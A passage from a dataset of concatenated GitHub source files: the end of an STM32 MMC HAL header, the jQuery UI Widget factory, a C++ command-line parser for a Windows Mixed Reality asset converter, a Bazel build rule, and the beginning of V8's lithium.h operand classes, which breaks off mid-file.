HAL_MMC_StateTypeDef HAL_MMC_GetState(MMC_HandleTypeDef *hmmc);
uint32_t HAL_MMC_GetError(MMC_HandleTypeDef *hmmc);
/**
* @}
*/
/** @defgroup MMC_Exported_Functions_Group6 Perioheral Abort management
* @{
*/
HAL_StatusTypeDef HAL_MMC_Abort(MMC_HandleTypeDef *hmmc);
HAL_StatusTypeDef HAL_MMC_Abort_IT(MMC_HandleTypeDef *hmmc);
/**
* @}
*/
/* Private types -------------------------------------------------------------*/
/** @defgroup MMC_Private_Types MMC Private Types
* @{
*/
/**
* @}
*/
/* Private defines -----------------------------------------------------------*/
/** @defgroup MMC_Private_Defines MMC Private Defines
* @{
*/
/**
* @}
*/
/* Private variables ---------------------------------------------------------*/
/** @defgroup MMC_Private_Variables MMC Private Variables
* @{
*/
/**
* @}
*/
/* Private constants ---------------------------------------------------------*/
/** @defgroup MMC_Private_Constants MMC Private Constants
* @{
*/
/**
* @}
*/
/* Private macros ------------------------------------------------------------*/
/** @defgroup MMC_Private_Macros MMC Private Macros
* @{
*/
/**
* @}
*/
/* Private functions prototypes ----------------------------------------------*/
/** @defgroup MMC_Private_Functions_Prototypes MMC Private Functions Prototypes
* @{
*/
/**
* @}
*/
/* Private functions ---------------------------------------------------------*/
/** @defgroup MMC_Private_Functions MMC Private Functions
* @{
*/
/**
* @}
*/
/**
* @}
*/
/**
* @}
*/
/**
* @}
*/
#endif /* STM32F103xE || STM32F103xG */
#ifdef __cplusplus
}
#endif
#endif /* __STM32F1xx_HAL_MMC_H */
/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/
| {
"pile_set_name": "Github"
} |
/*!
* jQuery UI Widget 1.9.2
* http://jqueryui.com
*
* Copyright 2012 jQuery Foundation and other contributors
* Released under the MIT license.
* http://jquery.org/license
*
* http://api.jqueryui.com/jQuery.widget/
*/
(function( $, undefined ) {
var uuid = 0,
slice = Array.prototype.slice,
_cleanData = $.cleanData;
$.cleanData = function( elems ) {
for ( var i = 0, elem; (elem = elems[i]) != null; i++ ) {
try {
$( elem ).triggerHandler( "remove" );
// http://bugs.jquery.com/ticket/8235
} catch( e ) {}
}
_cleanData( elems );
};
$.widget = function( name, base, prototype ) {
var fullName, existingConstructor, constructor, basePrototype,
namespace = name.split( "." )[ 0 ];
name = name.split( "." )[ 1 ];
fullName = namespace + "-" + name;
if ( !prototype ) {
prototype = base;
base = $.Widget;
}
// create selector for plugin
$.expr[ ":" ][ fullName.toLowerCase() ] = function( elem ) {
return !!$.data( elem, fullName );
};
$[ namespace ] = $[ namespace ] || {};
existingConstructor = $[ namespace ][ name ];
constructor = $[ namespace ][ name ] = function( options, element ) {
// allow instantiation without "new" keyword
if ( !this._createWidget ) {
return new constructor( options, element );
}
// allow instantiation without initializing for simple inheritance
// must use "new" keyword (the code above always passes args)
if ( arguments.length ) {
this._createWidget( options, element );
}
};
// extend with the existing constructor to carry over any static properties
$.extend( constructor, existingConstructor, {
version: prototype.version,
// copy the object used to create the prototype in case we need to
// redefine the widget later
_proto: $.extend( {}, prototype ),
// track widgets that inherit from this widget in case this widget is
// redefined after a widget inherits from it
_childConstructors: []
});
basePrototype = new base();
// we need to make the options hash a property directly on the new instance
// otherwise we'll modify the options hash on the prototype that we're
// inheriting from
basePrototype.options = $.widget.extend( {}, basePrototype.options );
$.each( prototype, function( prop, value ) {
if ( $.isFunction( value ) ) {
prototype[ prop ] = (function() {
var _super = function() {
return base.prototype[ prop ].apply( this, arguments );
},
_superApply = function( args ) {
return base.prototype[ prop ].apply( this, args );
};
return function() {
var __super = this._super,
__superApply = this._superApply,
returnValue;
this._super = _super;
this._superApply = _superApply;
returnValue = value.apply( this, arguments );
this._super = __super;
this._superApply = __superApply;
return returnValue;
};
})();
}
});
constructor.prototype = $.widget.extend( basePrototype, {
// TODO: remove support for widgetEventPrefix
// always use the name + a colon as the prefix, e.g., draggable:start
// don't prefix for widgets that aren't DOM-based
widgetEventPrefix: existingConstructor ? basePrototype.widgetEventPrefix : name
}, prototype, {
constructor: constructor,
namespace: namespace,
widgetName: name,
// TODO remove widgetBaseClass, see #8155
widgetBaseClass: fullName,
widgetFullName: fullName
});
// If this widget is being redefined then we need to find all widgets that
// are inheriting from it and redefine all of them so that they inherit from
// the new version of this widget. We're essentially trying to replace one
// level in the prototype chain.
if ( existingConstructor ) {
$.each( existingConstructor._childConstructors, function( i, child ) {
var childPrototype = child.prototype;
// redefine the child widget using the same prototype that was
// originally used, but inherit from the new version of the base
$.widget( childPrototype.namespace + "." + childPrototype.widgetName, constructor, child._proto );
});
// remove the list of existing child constructors from the old constructor
// so the old child constructors can be garbage collected
delete existingConstructor._childConstructors;
} else {
base._childConstructors.push( constructor );
}
$.widget.bridge( name, constructor );
};
$.widget.extend = function( target ) {
var input = slice.call( arguments, 1 ),
inputIndex = 0,
inputLength = input.length,
key,
value;
for ( ; inputIndex < inputLength; inputIndex++ ) {
for ( key in input[ inputIndex ] ) {
value = input[ inputIndex ][ key ];
if ( input[ inputIndex ].hasOwnProperty( key ) && value !== undefined ) {
// Clone objects
if ( $.isPlainObject( value ) ) {
target[ key ] = $.isPlainObject( target[ key ] ) ?
$.widget.extend( {}, target[ key ], value ) :
// Don't extend strings, arrays, etc. with objects
$.widget.extend( {}, value );
// Copy everything else by reference
} else {
target[ key ] = value;
}
}
}
}
return target;
};
$.widget.bridge = function( name, object ) {
var fullName = object.prototype.widgetFullName || name;
$.fn[ name ] = function( options ) {
var isMethodCall = typeof options === "string",
args = slice.call( arguments, 1 ),
returnValue = this;
// allow multiple hashes to be passed on init
options = !isMethodCall && args.length ?
$.widget.extend.apply( null, [ options ].concat(args) ) :
options;
if ( isMethodCall ) {
this.each(function() {
var methodValue,
instance = $.data( this, fullName );
if ( !instance ) {
return $.error( "cannot call methods on " + name + " prior to initialization; " +
"attempted to call method '" + options + "'" );
}
if ( !$.isFunction( instance[options] ) || options.charAt( 0 ) === "_" ) {
return $.error( "no such method '" + options + "' for " + name + " widget instance" );
}
methodValue = instance[ options ].apply( instance, args );
if ( methodValue !== instance && methodValue !== undefined ) {
returnValue = methodValue && methodValue.jquery ?
returnValue.pushStack( methodValue.get() ) :
methodValue;
return false;
}
});
} else {
this.each(function() {
var instance = $.data( this, fullName );
if ( instance ) {
instance.option( options || {} )._init();
} else {
$.data( this, fullName, new object( options, this ) );
}
});
}
return returnValue;
};
};
$.Widget = function( /* options, element */ ) {};
$.Widget._childConstructors = [];
$.Widget.prototype = {
widgetName: "widget",
widgetEventPrefix: "",
defaultElement: "<div>",
options: {
disabled: false,
// callbacks
create: null
},
_createWidget: function( options, element ) {
element = $( element || this.defaultElement || this )[ 0 ];
this.element = $( element );
this.uuid = uuid++;
this.eventNamespace = "." + this.widgetName + this.uuid;
this.options = $.widget.extend( {},
this.options,
this._getCreateOptions(),
options );
this.bindings = $();
this.hoverable = $();
this.focusable = $();
if ( element !== this ) {
// 1.9 BC for #7810
// TODO remove dual storage
$.data( element, this.widgetName, this );
$.data( element, this.widgetFullName, this );
this._on( true, this.element, {
remove: function( event ) {
if ( event.target === element ) {
this.destroy();
}
}
});
this.document = $( element.style ?
// element within the document
element.ownerDocument :
// element is window or document
element.document || element );
this.window = $( this.document[0].defaultView || this.document[0].parentWindow );
}
this._create();
this._trigger( "create", null, this._getCreateEventData() );
this._init();
},
_getCreateOptions: $.noop,
_getCreateEventData: $.noop,
_create: $.noop,
_init: $.noop,
destroy: function() {
this._destroy();
// we can probably remove the unbind calls in 2.0
// all event bindings should go through this._on()
this.element
.unbind( this.eventNamespace )
// 1.9 BC for #7810
// TODO remove dual storage
.removeData( this.widgetName )
.removeData( this.widgetFullName )
// support: jquery <1.6.3
// http://bugs.jquery.com/ticket/9413
.removeData( $.camelCase( this.widgetFullName ) );
this.widget()
.unbind( this.eventNamespace )
.removeAttr( "aria-disabled" )
.removeClass(
this.widgetFullName + "-disabled " +
"ui-state-disabled" );
// clean up events and states
this.bindings.unbind( this.eventNamespace );
this.hoverable.removeClass( "ui-state-hover" );
this.focusable.removeClass( "ui-state-focus" );
},
_destroy: $.noop,
widget: function() {
return this.element;
},
option: function( key, value ) {
var options = key,
parts,
curOption,
i;
if ( arguments.length === 0 ) {
// don't return a reference to the internal hash
return $.widget.extend( {}, this.options );
}
if ( typeof key === "string" ) {
// handle nested keys, e.g., "foo.bar" => { foo: { bar: ___ } }
options = {};
parts = key.split( "." );
key = parts.shift();
if ( parts.length ) {
curOption = options[ key ] = $.widget.extend( {}, this.options[ key ] );
for ( i = 0; i < parts.length - 1; i++ ) {
curOption[ parts[ i ] ] = curOption[ parts[ i ] ] || {};
curOption = curOption[ parts[ i ] ];
}
key = parts.pop();
if ( value === undefined ) {
return curOption[ key ] === undefined ? null : curOption[ key ];
}
curOption[ key ] = value;
} else {
if ( value === undefined ) {
return this.options[ key ] === undefined ? null : this.options[ key ];
}
options[ key ] = value;
}
}
this._setOptions( options );
return this;
},
_setOptions: function( options ) {
var key;
for ( key in options ) {
this._setOption( key, options[ key ] );
}
return this;
},
_setOption: function( key, value ) {
this.options[ key ] = value;
if ( key === "disabled" ) {
this.widget()
.toggleClass( this.widgetFullName + "-disabled ui-state-disabled", !!value )
.attr( "aria-disabled", value );
this.hoverable.removeClass( "ui-state-hover" );
this.focusable.removeClass( "ui-state-focus" );
}
return this;
},
enable: function() {
return this._setOption( "disabled", false );
},
disable: function() {
return this._setOption( "disabled", true );
},
_on: function( suppressDisabledCheck, element, handlers ) {
var delegateElement,
instance = this;
// no suppressDisabledCheck flag, shuffle arguments
if ( typeof suppressDisabledCheck !== "boolean" ) {
handlers = element;
element = suppressDisabledCheck;
suppressDisabledCheck = false;
}
// no element argument, shuffle and use this.element
if ( !handlers ) {
handlers = element;
element = this.element;
delegateElement = this.widget();
} else {
// accept selectors, DOM elements
element = delegateElement = $( element );
this.bindings = this.bindings.add( element );
}
$.each( handlers, function( event, handler ) {
function handlerProxy() {
// allow widgets to customize the disabled handling
// - disabled as an array instead of boolean
// - disabled class as method for disabling individual parts
if ( !suppressDisabledCheck &&
( instance.options.disabled === true ||
$( this ).hasClass( "ui-state-disabled" ) ) ) {
return;
}
return ( typeof handler === "string" ? instance[ handler ] : handler )
.apply( instance, arguments );
}
// copy the guid so direct unbinding works
if ( typeof handler !== "string" ) {
handlerProxy.guid = handler.guid =
handler.guid || handlerProxy.guid || $.guid++;
}
var match = event.match( /^(\w+)\s*(.*)$/ ),
eventName = match[1] + instance.eventNamespace,
selector = match[2];
if ( selector ) {
delegateElement.delegate( selector, eventName, handlerProxy );
} else {
element.bind( eventName, handlerProxy );
}
});
},
_off: function( element, eventName ) {
eventName = (eventName || "").split( " " ).join( this.eventNamespace + " " ) + this.eventNamespace;
element.unbind( eventName ).undelegate( eventName );
},
_delay: function( handler, delay ) {
function handlerProxy() {
return ( typeof handler === "string" ? instance[ handler ] : handler )
.apply( instance, arguments );
}
var instance = this;
return setTimeout( handlerProxy, delay || 0 );
},
_hoverable: function( element ) {
this.hoverable = this.hoverable.add( element );
this._on( element, {
mouseenter: function( event ) {
$( event.currentTarget ).addClass( "ui-state-hover" );
},
mouseleave: function( event ) {
$( event.currentTarget ).removeClass( "ui-state-hover" );
}
});
},
_focusable: function( element ) {
this.focusable = this.focusable.add( element );
this._on( element, {
focusin: function( event ) {
$( event.currentTarget ).addClass( "ui-state-focus" );
},
focusout: function( event ) {
$( event.currentTarget ).removeClass( "ui-state-focus" );
}
});
},
_trigger: function( type, event, data ) {
var prop, orig,
callback = this.options[ type ];
data = data || {};
event = $.Event( event );
event.type = ( type === this.widgetEventPrefix ?
type :
this.widgetEventPrefix + type ).toLowerCase();
// the original event may come from any element
// so we need to reset the target on the new event
event.target = this.element[ 0 ];
// copy original event properties over to the new event
orig = event.originalEvent;
if ( orig ) {
for ( prop in orig ) {
if ( !( prop in event ) ) {
event[ prop ] = orig[ prop ];
}
}
}
this.element.trigger( event, data );
return !( $.isFunction( callback ) &&
callback.apply( this.element[0], [ event ].concat( data ) ) === false ||
event.isDefaultPrevented() );
}
};
$.each( { show: "fadeIn", hide: "fadeOut" }, function( method, defaultEffect ) {
$.Widget.prototype[ "_" + method ] = function( element, options, callback ) {
if ( typeof options === "string" ) {
options = { effect: options };
}
var hasOptions,
effectName = !options ?
method :
options === true || typeof options === "number" ?
defaultEffect :
options.effect || defaultEffect;
options = options || {};
if ( typeof options === "number" ) {
options = { duration: options };
}
hasOptions = !$.isEmptyObject( options );
options.complete = callback;
if ( options.delay ) {
element.delay( options.delay );
}
if ( hasOptions && $.effects && ( $.effects.effect[ effectName ] || $.uiBackCompat !== false && $.effects[ effectName ] ) ) {
element[ method ]( options );
} else if ( effectName !== method && element[ effectName ] ) {
element[ effectName ]( options.duration, options.easing, callback );
} else {
element.queue(function( next ) {
$( this )[ method ]();
if ( callback ) {
callback.call( element[ 0 ] );
}
next();
});
}
};
});
// DEPRECATED
if ( $.uiBackCompat !== false ) {
$.Widget.prototype._getCreateOptions = function() {
return $.metadata && $.metadata.get( this.element[0] )[ this.widgetName ];
};
}
})( jQuery );
| {
"pile_set_name": "Github"
} |
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License. See LICENSE in the project root for license information.
#include "stdafx.h"
#include "CommandLine.h"
#include "FileSystem.h"
// Constants
const wchar_t * PARAM_OUTFILE = L"-o";
const wchar_t * PARAM_TMPDIR = L"-temp-directory";
const wchar_t * PARAM_LOD = L"-lod";
const wchar_t * PARAM_SCREENCOVERAGE = L"-screen-coverage";
const wchar_t * PARAM_MAXTEXTURESIZE = L"-max-texture-size";
const wchar_t * PARAM_SHARE_MATERIALS = L"-share-materials";
const wchar_t * PARAM_MIN_VERSION = L"-min-version";
const wchar_t * PARAM_PLATFORM = L"-platform";
const wchar_t * PARAM_REPLACE_TEXTURES = L"-replace-textures";
const wchar_t * PARAM_COMPRESS_MESHES = L"-compress-meshes";
const wchar_t * PARAM_VALUE_VERSION_1709 = L"1709";
const wchar_t * PARAM_VALUE_VERSION_1803 = L"1803";
const wchar_t * PARAM_VALUE_VERSION_1809 = L"1809";
const wchar_t * PARAM_VALUE_VERSION_RS3 = L"rs3";
const wchar_t * PARAM_VALUE_VERSION_RS4 = L"rs4";
const wchar_t * PARAM_VALUE_VERSION_RS5 = L"rs5";
const wchar_t * PARAM_VALUE_VERSION_LATEST = L"latest";
const wchar_t * PARAM_VALUE_HOLOGRAPHIC = L"holographic";
const wchar_t * PARAM_VALUE_HOLOLENS= L"hololens";
const wchar_t * PARAM_VALUE_DESKTOP = L"desktop";
const wchar_t * PARAM_VALUE_PC = L"pc";
const wchar_t * PARAM_VALUE_ALL = L"all";
const wchar_t * SUFFIX_CONVERTED = L"_converted";
const wchar_t * CLI_INDENT = L" ";
const size_t MAXTEXTURESIZE_DEFAULT = 512;
const size_t MAXTEXTURESIZE_MAX = 4096;
const CommandLine::Version MIN_VERSION_DEFAULT = CommandLine::Version::Version1709;
const CommandLine::Platform PLATFORM_DEFAULT = CommandLine::Platform::Desktop;
enum class CommandLineParsingState
{
Initial,
InputRead,
ReadOutFile,
ReadTmpDir,
ReadLods,
ReadScreenCoverage,
ReadMaxTextureSize,
ReadMinVersion,
ReadPlatform
};
void CommandLine::PrintHelp()
{
auto indent = std::wstring(CLI_INDENT);
std::wcerr << std::endl
<< L"Windows Mixed Reality Asset Converter" << std::endl
<< L"=====================================" << std::endl
<< std::endl
<< L"A command line tool to convert core GLTF 2.0 assets for use in "
<< L"the Windows Mixed Reality home, with the proper texture packing, compression and merged LODs." << std::endl << std::endl
<< L"Usage: WindowsMRAssetConverter <path to GLTF/GLB>" << std::endl
<< std::endl
<< L"Optional arguments:" << std::endl
<< indent << "[" << std::wstring(PARAM_OUTFILE) << L" <output file path>]" << std::endl
<< indent << "[" << std::wstring(PARAM_TMPDIR) << L" <temporary folder>] - default is the system temp folder for the user" << std::endl
<< indent << "[" << std::wstring(PARAM_PLATFORM) << " <" << PARAM_VALUE_ALL << " | " << PARAM_VALUE_HOLOGRAPHIC << " | " << PARAM_VALUE_DESKTOP << ">] - defaults to " << PARAM_VALUE_DESKTOP << std::endl
<< indent << "[" << std::wstring(PARAM_MIN_VERSION) << " <" << PARAM_VALUE_VERSION_1709 << " | " << PARAM_VALUE_VERSION_1803 << " | " << PARAM_VALUE_VERSION_1809 << " | " << PARAM_VALUE_VERSION_LATEST << ">] - defaults to " << PARAM_VALUE_VERSION_1709 << std::endl
<< indent << "[" << std::wstring(PARAM_LOD) << " <path to each lower LOD asset in descending order of quality>]" << std::endl
<< indent << "[" << std::wstring(PARAM_SCREENCOVERAGE) << " <LOD screen coverage values>]" << std::endl
<< indent << "[" << std::wstring(PARAM_SHARE_MATERIALS) << "] - disabled if not present" << std::endl
<< indent << "[" << std::wstring(PARAM_MAXTEXTURESIZE) << " <Max texture size in pixels>] - defaults to 512" << std::endl
<< indent << "[" << std::wstring(PARAM_REPLACE_TEXTURES) << "] - disabled if not present" << std::endl
<< indent << "[" << std::wstring(PARAM_COMPRESS_MESHES) << "] - compress meshes with Draco" << std::endl
<< std::endl
<< "Example:" << std::endl
<< indent << "WindowsMRAssetConverter FileToConvert.gltf "
<< std::wstring(PARAM_OUTFILE) << " ConvertedFile.glb "
<< std::wstring(PARAM_LOD) << " Lod1.gltf Lod2.gltf "
<< std::wstring(PARAM_SCREENCOVERAGE) << " 0.5 0.2 0.01" << std::endl
<< std::endl
<< "The above will convert \"FileToConvert.gltf\" into \"ConvertedFile.glb\" in the "
<< "current directory." << std::endl
<< std::endl
<< "If the file is a GLB and the output name is not specified, defaults to the same name as input "
<< "+ \"_converted.glb\"." << std::endl
<< std::endl;
}
void CommandLine::ParseCommandLineArguments(
int argc, wchar_t *argv[],
std::wstring& inputFilePath, AssetType& inputAssetType, std::wstring& outFilePath, std::wstring& tempDirectory,
std::vector<std::wstring>& lodFilePaths, std::vector<double>& screenCoveragePercentages, size_t& maxTextureSize,
bool& shareMaterials, Version& minVersion, Platform& targetPlatforms, bool& replaceTextures, bool& compressMeshes)
{
CommandLineParsingState state = CommandLineParsingState::Initial;
inputFilePath = FileSystem::GetFullPath(std::wstring(argv[1]));
inputAssetType = AssetTypeUtils::AssetTypeFromFilePath(inputFilePath);
// Reset input parameters
outFilePath = L"";
tempDirectory = L"";
lodFilePaths.clear();
screenCoveragePercentages.clear();
maxTextureSize = MAXTEXTURESIZE_DEFAULT;
shareMaterials = false;
minVersion = MIN_VERSION_DEFAULT;
targetPlatforms = PLATFORM_DEFAULT;
replaceTextures = false;
compressMeshes = false;
state = CommandLineParsingState::InputRead;
std::wstring outFile;
std::wstring tmpDir;
for (int i = 2; i < argc; i++)
{
std::wstring param = argv[i];
if (param == PARAM_OUTFILE)
{
outFile = L"";
state = CommandLineParsingState::ReadOutFile;
}
else if (param == PARAM_TMPDIR)
{
tmpDir = L"";
state = CommandLineParsingState::ReadTmpDir;
}
else if (param == PARAM_LOD)
{
lodFilePaths.clear();
state = CommandLineParsingState::ReadLods;
}
else if (param == PARAM_SCREENCOVERAGE)
{
screenCoveragePercentages.clear();
state = CommandLineParsingState::ReadScreenCoverage;
}
else if (param == PARAM_MAXTEXTURESIZE)
{
maxTextureSize = MAXTEXTURESIZE_DEFAULT;
state = CommandLineParsingState::ReadMaxTextureSize;
}
else if (param == PARAM_SHARE_MATERIALS)
{
shareMaterials = true;
state = CommandLineParsingState::InputRead;
}
else if (param == PARAM_MIN_VERSION)
{
minVersion = MIN_VERSION_DEFAULT;
state = CommandLineParsingState::ReadMinVersion;
}
else if (param == PARAM_PLATFORM)
{
targetPlatforms = PLATFORM_DEFAULT;
state = CommandLineParsingState::ReadPlatform;
}
else if (param == PARAM_REPLACE_TEXTURES)
{
replaceTextures = true;
state = CommandLineParsingState::InputRead;
}
else if (param == PARAM_COMPRESS_MESHES)
{
if (minVersion >= CommandLine::Version::Version1809)
{
compressMeshes = true;
}
else
{
throw std::invalid_argument("Invalid min version specified with mesh compression; must be at least 1809.");
}
state = CommandLineParsingState::InputRead;
}
else
{
switch (state)
{
case CommandLineParsingState::ReadOutFile:
outFile = FileSystem::GetFullPath(param);
state = CommandLineParsingState::InputRead;
break;
case CommandLineParsingState::ReadTmpDir:
tmpDir = FileSystem::GetFullPath(param);
state = CommandLineParsingState::InputRead;
break;
case CommandLineParsingState::ReadLods:
lodFilePaths.push_back(FileSystem::GetFullPath(param));
break;
case CommandLineParsingState::ReadScreenCoverage:
{
auto paramA = std::string(param.begin(), param.end());
screenCoveragePercentages.push_back(std::atof(paramA.c_str()));
break;
}
case CommandLineParsingState::ReadMaxTextureSize:
maxTextureSize = std::min(static_cast<size_t>(std::stoul(param.c_str())), MAXTEXTURESIZE_MAX);
break;
case CommandLineParsingState::ReadMinVersion:
if (_wcsicmp(param.c_str(), PARAM_VALUE_VERSION_1709) == 0 || _wcsicmp(param.c_str(), PARAM_VALUE_VERSION_RS3) == 0)
{
minVersion = Version::Version1709;
}
else if (_wcsicmp(param.c_str(), PARAM_VALUE_VERSION_1803) == 0 || _wcsicmp(param.c_str(), PARAM_VALUE_VERSION_RS4) == 0)
{
minVersion = Version::Version1803;
}
else if (_wcsicmp(param.c_str(), PARAM_VALUE_VERSION_1809) == 0 || _wcsicmp(param.c_str(), PARAM_VALUE_VERSION_RS5) == 0)
{
minVersion = Version::Version1809;
}
else if (_wcsicmp(param.c_str(), PARAM_VALUE_VERSION_LATEST) == 0)
{
minVersion = Version::Latest;
}
else
{
throw std::invalid_argument("Invalid min version specified. For help, try the command again without parameters.");
}
state = CommandLineParsingState::InputRead;
break;
case CommandLineParsingState::ReadPlatform:
if (_wcsicmp(param.c_str(), PARAM_VALUE_ALL) == 0)
{
targetPlatforms = (Platform) (Platform::Desktop | Platform::Holographic);
}
else if (_wcsicmp(param.c_str(), PARAM_VALUE_HOLOGRAPHIC) == 0 || _wcsicmp(param.c_str(), PARAM_VALUE_HOLOLENS) == 0)
{
targetPlatforms = Platform::Holographic;
}
else if (_wcsicmp(param.c_str(), PARAM_VALUE_DESKTOP) == 0 || _wcsicmp(param.c_str(), PARAM_VALUE_PC) == 0)
{
targetPlatforms = Platform::Desktop;
}
else
{
throw std::invalid_argument("Invalid platform specified. For help, try the command again without parameters.");
}
state = CommandLineParsingState::InputRead;
break;
case CommandLineParsingState::Initial:
case CommandLineParsingState::InputRead:
default:
// Invalid argument detected
throw std::invalid_argument("Invalid usage. For help, try the command again without parameters.");
}
}
}
if (!std::experimental::filesystem::exists(inputFilePath))
{
throw std::invalid_argument("Input file not found.");
}
for (auto& lodFilePath : lodFilePaths)
{
if (!std::experimental::filesystem::exists(lodFilePath))
{
throw std::invalid_argument("Lod file not found.");
}
}
if (outFile.empty())
{
std::wstring inputFilePathWithoutExtension = inputFilePath;
if (FAILED(PathCchRemoveExtension(&inputFilePathWithoutExtension[0], inputFilePathWithoutExtension.length() + 1)))
{
throw std::invalid_argument("Invalid input file extension.");
}
outFile = std::wstring(&inputFilePathWithoutExtension[0]);
if (inputAssetType == AssetType::GLB)
{
outFile += SUFFIX_CONVERTED;
}
outFile += EXTENSION_GLB;
}
outFilePath = outFile;
if (tmpDir.empty())
{
tmpDir = FileSystem::CreateTempFolder();
}
tempDirectory = tmpDir;
}
| {
"pile_set_name": "Github"
} |
load("@rules_haskell//haskell:cabal.bzl", "haskell_cabal_binary")
haskell_cabal_binary(
name = "cabal-toolchain-flags",
srcs = glob(["**"]),
)
| {
"pile_set_name": "Github"
} |
// Copyright 2011 the V8 project authors. All rights reserved.
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following
// disclaimer in the documentation and/or other materials provided
// with the distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived
// from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#ifndef V8_LITHIUM_H_
#define V8_LITHIUM_H_
#include "hydrogen.h"
#include "safepoint-table.h"
namespace v8 {
namespace internal {
class LOperand: public ZoneObject {
public:
enum Kind {
INVALID,
UNALLOCATED,
CONSTANT_OPERAND,
STACK_SLOT,
DOUBLE_STACK_SLOT,
REGISTER,
DOUBLE_REGISTER,
ARGUMENT
};
LOperand() : value_(KindField::encode(INVALID)) { }
Kind kind() const { return KindField::decode(value_); }
int index() const { return static_cast<int>(value_) >> kKindFieldWidth; }
bool IsConstantOperand() const { return kind() == CONSTANT_OPERAND; }
bool IsStackSlot() const { return kind() == STACK_SLOT; }
bool IsDoubleStackSlot() const { return kind() == DOUBLE_STACK_SLOT; }
bool IsRegister() const { return kind() == REGISTER; }
bool IsDoubleRegister() const { return kind() == DOUBLE_REGISTER; }
bool IsArgument() const { return kind() == ARGUMENT; }
bool IsUnallocated() const { return kind() == UNALLOCATED; }
bool Equals(LOperand* other) const { return value_ == other->value_; }
int VirtualRegister();
void PrintTo(StringStream* stream);
void ConvertTo(Kind kind, int index) {
value_ = KindField::encode(kind);
value_ |= index << kKindFieldWidth;
ASSERT(this->index() == index);
}
protected:
static const int kKindFieldWidth = 3;
class KindField : public BitField<Kind, 0, kKindFieldWidth> { };
LOperand(Kind kind, int index) { ConvertTo(kind, index); }
unsigned value_;
};
class LUnallocated: public LOperand {
public:
enum Policy {
NONE,
ANY,
FIXED_REGISTER,
FIXED_DOUBLE_REGISTER,
FIXED_SLOT,
MUST_HAVE_REGISTER,
WRITABLE_REGISTER,
SAME_AS_FIRST_INPUT,
IGNORE
};
// Lifetime of operand inside the instruction.
enum Lifetime {
// USED_AT_START operand is guaranteed to be live only at
// instruction start. Register allocator is free to assign the same register
// to some other operand used inside instruction (i.e. temporary or
// output).
USED_AT_START,
// USED_AT_END operand is treated as live until the end of
// instruction. This means that register allocator will not reuse it's
// register for any other operand inside instruction.
USED_AT_END
};
explicit LUnallocated(Policy policy) : LOperand(UNALLOCATED, 0) {
Initialize(policy, 0, USED_AT_END);
}
LUnallocated(Policy policy, int fixed_index) : LOperand(UNALLOCATED, 0) {
Initialize(policy, fixed_index, USED_AT_END);
}
LUnallocated(Policy policy, Lifetime lifetime) : LOperand(UNALLOCATED, 0) {
Initialize(policy, 0, lifetime);
}
// The superclass has a KindField. Some policies have a signed fixed
// index in the upper bits.
static const int kPolicyWidth = 4;
static const int kLifetimeWidth = 1;
static const int kVirtualRegisterWidth = 17;
static const int kPolicyShift = kKindFieldWidth;
static const int kLifetimeShift = kPolicyShift + kPolicyWidth;
static const int kVirtualRegisterShift = kLifetimeShift + kLifetimeWidth;
static const int kFixedIndexShift =
kVirtualRegisterShift + kVirtualRegisterWidth;
class PolicyField : public BitField<Policy, kPolicyShift, kPolicyWidth> { };
class LifetimeField
: public BitField<Lifetime, kLifetimeShift, kLifetimeWidth> {
};
class VirtualRegisterField
: public BitField<unsigned,
kVirtualRegisterShift,
kVirtualRegisterWidth> {
};
static const int kMaxVirtualRegisters = 1 << (kVirtualRegisterWidth + 1);
static const int kMaxFixedIndices = 128;
bool HasIgnorePolicy() const { return policy() == IGNORE; }
bool HasNoPolicy() const { return policy() == NONE; }
bool HasAnyPolicy() const {
return policy() == ANY;
}
bool HasFixedPolicy() const {
return policy() == FIXED_REGISTER ||
policy() == FIXED_DOUBLE_REGISTER ||
policy() == FIXED_SLOT;
}
bool HasRegisterPolicy() const {
return policy() == WRITABLE_REGISTER || policy() == MUST_HAVE_REGISTER;
}
bool HasSameAsInputPolicy() const {
return policy() == SAME_AS_FIRST_INPUT;
}
Policy policy() const { return PolicyField::decode(value_); }
void set_policy(Policy policy) {
value_ &= ~PolicyField::mask();
value_ |= PolicyField::encode(policy);
}
int fixed_index() const {
return static_cast<int>(value_) >> kFixedIndexShift;
}
unsigned virtual_register() const {
return VirtualRegisterField::decode(value_);
}
void set_virtual_register(unsigned id) {
value_ &= ~VirtualRegisterField::mask();
value_ |= VirtualRegisterField::encode(id);
}
LUnallocated* CopyUnconstrained() {
LUnallocated* result = new LUnallocated(ANY);
result->set_virtual_register(virtual_register());
return result;
}
static LUnallocated* cast(LOperand* op) {
ASSERT(op->IsUnallocated());
return reinterpret_cast<LUnallocated*>(op);
}
bool IsUsedAtStart() {
return LifetimeField::decode(value_) == USED_AT_START;
}
private:
void Initialize(Policy policy, int fixed_index, Lifetime lifetime) {
value_ |= PolicyField::encode(policy);
value_ |= LifetimeField::encode(lifetime);
value_ |= fixed_index << kFixedIndexShift;
ASSERT(this->fixed_index() == fixed_index);
}
};
class LMoveOperands BASE_EMBEDDED {
public:
LMoveOperands(LOperand* source, LOperand* destination)
: source_(source), destination_(destination) {
}
